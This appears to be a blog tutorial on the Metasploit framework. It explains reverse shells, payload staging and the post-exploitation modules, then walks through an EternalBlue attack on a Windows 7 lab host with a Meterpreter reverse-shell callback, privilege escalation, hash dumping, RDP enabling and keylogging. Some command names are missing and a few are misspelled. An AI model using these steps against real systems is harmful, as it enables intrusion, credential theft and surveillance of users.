In this post I am going to briefly cover the exploitation process with the Metasploit framework. A framework is defined as a real or conceptual structure intended to serve as a support or guide for the building of something that expands the structure into something useful. The Metasploit framework allows red teamers to configure an exploit, choose a payload, an encoding technique to obfuscate the payload, and post-exploitation modules after access is gained. The next couple of sections are going to walk through the process of exploitation. I believe the Metasploit approach is a template to know because other frameworks and tools follow the same flow.
Exploits vs. vulnerabilities
In the simplest of terms a vulnerability is a weakness in a system. Vulnerabilities exists in operating systems, applications and hardware appliances. An exploit takes advantage of a vulnerability to gain control of an asset and potentially cause harm to a system.
Bind shells vs. reverse shells
One of the biggest misconceptions in security to beginners is the difference between bind and reverse shells. Bind shells are typically not used because there are obstacles to overcome when using them. Bind shells require an attacker to have access to a system to bind the shell to a port. Second, bind shells are not useful if the infected system is behind a firewall/NAT device. The firewall/NAT has to have a rule allowing traffic initiated from the attacker to flow through the device to the bind shell. This type of setup is not ideal and leaves artifacts behind that can be discovered. However, if a bind shell is setup correctly it allows an attacker to initiate a connection to the infected box anytime.
The better alternative is a reverse shell which can flow through a firewall/NAT device with ease. The reason this works is because firewall/NAT devices are meant to block ingress(inbound) traffic by default. However, these devices allow all egress(outbound) traffic out of the network to their destination. This is because we inherently trust the devices in our own network and block all devices initiating connections to our network. Reverse shells take advantage of how these technologies function. An attacker will typically use a phishing style of attack to send a user a malicious PDF. If a user decides to open the PDF it will initiate a connection from the user’s PC back to our attacking box.
Red team tip
A famous red teamer that goes by the name of Mubix has a saying of “Two is one and one is none”. What this means, is if you have two shells on a box and the blue team finds one you can still act. If you only have one shell and they cut that access you no longer have control of that box. In a later post I will be covering various persistence mechanism that can be used to keep access on a box.
Metasploit listeners are how reverse shells connect back to us. During the payload stage(see the payload process section) we instruct our reverse shell how to connect back to us when the exploit is executed. This listener can be setup to handle one or more reverse shell connections. The great thing about the Metasploit framework is listeners accommodate all types of protocols and options.
The most common type of connection is a reverse_tcp listener which establishes a connection between the attacker(server) and infected machine(client). Metasploit provides a reverse_http listener which communicates between the the attacker and infected machine via HTTP. Now the reason for an HTTP listener is if a network has strict egress filtering. Almost all networks allow DNS and HTTP outbound because they are the most widely used protocols on the internet. Since HTTP is normal traffic it may bypass security measurers in place that may stop malicious outbound connections like a reverse_tcp shell.
The Metasploit Framework provides multiple types of payloads but we are going to cover singles, stagers, stages, Meterpreter, and Inline payloads. Payloads are typically used to create a connection between the attacker machine and the infected machine. The payload allows us to send commands to the infected machine for the next task or set or tasks. This section will cover the basics of a payload.
Payloads are typically broken down into stagers and stages. The stagers are small strings of shellcode because the initial space to execute code is small. The stager will create a connection back to the attacker machine for the next execution stage. The stager will also allocate a chunk of memory big enough for the stage.
Stages are requested by the stager and are traditionally bigger in nature. A stage can also be written in C because the space requirement is no longer a factor. Furthermore, a stage may provide additional functionality such as Meterpreter.
Post-exploitation modules are run on a compromised system to gather information, capture data, and manage the system. Gathering modules are used as the title implies to gather data. For example, we can check if the compromised system is in a VM, collect hashes of users, get a dump of recently opened files, and get a list of applications installed on the system. Capture modules are used to capture data from the user on the remote system. For example, we can capture key strokes, screenshots of the desktop, webcam footage, and microphone audio. Manage modules are used to perform system administrative actions on the compromised system. For example, we can enable remote desktop, delete users, add network routes, and process migration.
Auxiliary modules are can be run remotely or through a session on a compromised box. Auxiliary modules are broken down into five sections which are admin, scanner, server, fuzzing, and gathering. Admin modules are used to administrate software or devices. For example, we can launch AWS EC2 instances if we have AWS keys, password reset on particular services, or backup a Windows registry.
Scanner modules are used to scan for network services, and then brute force a login into that service. For example we can do a scan for SMB shares on a network and then attempt a bruteforce a share login. Server modules are used to host certain network services on a network. For example we could host an FTP server for files and credential collection, DHCP server to hand out IP allocations, and DNS server to control domain queries. Fuzzing modules are used to send random strings of data at network services. The hope is that fuzzers can send a string of data the network service is not made to handle and crash it. Gathering modules are used to obtain information from network services such as enumerating DNS hostnames.
Metasploit utilizes a Postgresql database to store sessions and information obtained using Metasploit. For example Metasploit has NMAP builtin into the framework and results from scans store in the database. For example, when a new host is discovered during a scan it is added to the database. This list can then be used when a module has an option for RHOSTS.
Metasploit has a feature called workspaces. This allows you to separate the data that is discovered based on different clients.
- Will show a list of current workspaces
- workspace -a <name>
- Will create a workspace
- workspace -d <name>
- Will create a workspace
- workspace <name>
- Will switch to a different workspace
importing and scanning
- db_import <nmap scan file>
- This command will input a list of hosts from an nmap scan output
- db_nmap <nmap option and flags>
- This command will launch an nmap scan and save hosts into the database
- This command will print a list of know hosts
- This command shows a list of known services discovered from known hosts
- This command will show a list of credentials that are a username and password pair
- This command will show a list of user hashes that are a username and hashed password pair
Attacking Windows 7 with EnternalBlue
This section will walk through using what we learned above with the EternalBlue exploit to gain access to a system. Once we have access to the host we can escalate to SYSTEM and have complete control of the infected system.
Staring Metasploit on Kali Linux 2.0
- service postgresql start
- msfdb init
- Initialize Metasploit database
Selecting/setup of exploit
- use exploit/windows/smb/ms17_010_eternalblue
- show options
- Shows all the configurable options for the exploit
- set RHOST 172.16.54.144
- Sets the IP of the remote host we will be attacking
Selecting/setup of the payload
- set PAYLOAD windows/x64/meterprever/reverse_tcp
- Sets Meterpreter as a payload and the payload is a reverse tcp connection
- show options
- Shows all the configurable options for the payload
- set LHOST 172.16.54.141
- Set the IP for the payload to connect back which is our attacking machine.
- set LPORT 1234
- Set the port for the payload to connect back to
- This will send the exploit at our remote machine. The exploit will run and the payload will call back for second part of the payload which is the stage. Once the stage is delivered we have a fully functional Meterpreter session.
- Shows all the commands/tasks that are built into Meterpreter that can be leveraged.
- This command will use various known techniques to escalate privileges to SYSTEM.
- This command will dump the hashes of each user on the system
- This command will take the Meterpreter session and push it to the foreground. This means we can pull our session from the background and utilize it later.
- This command will print a list of usable sessions
- session -i 1
- This command will allow us to take control of the Meterpreter session again.
- run post/windows/gather/enum_applications
- This module will get a list of applications installed on the remote machine
- run post/windows/manage/enable_rdp
- This module will enable remote desktop on the remote machine
- run post/windows/capture/keylog_recorder
- This module will install a key logger and record keystrokes to file listed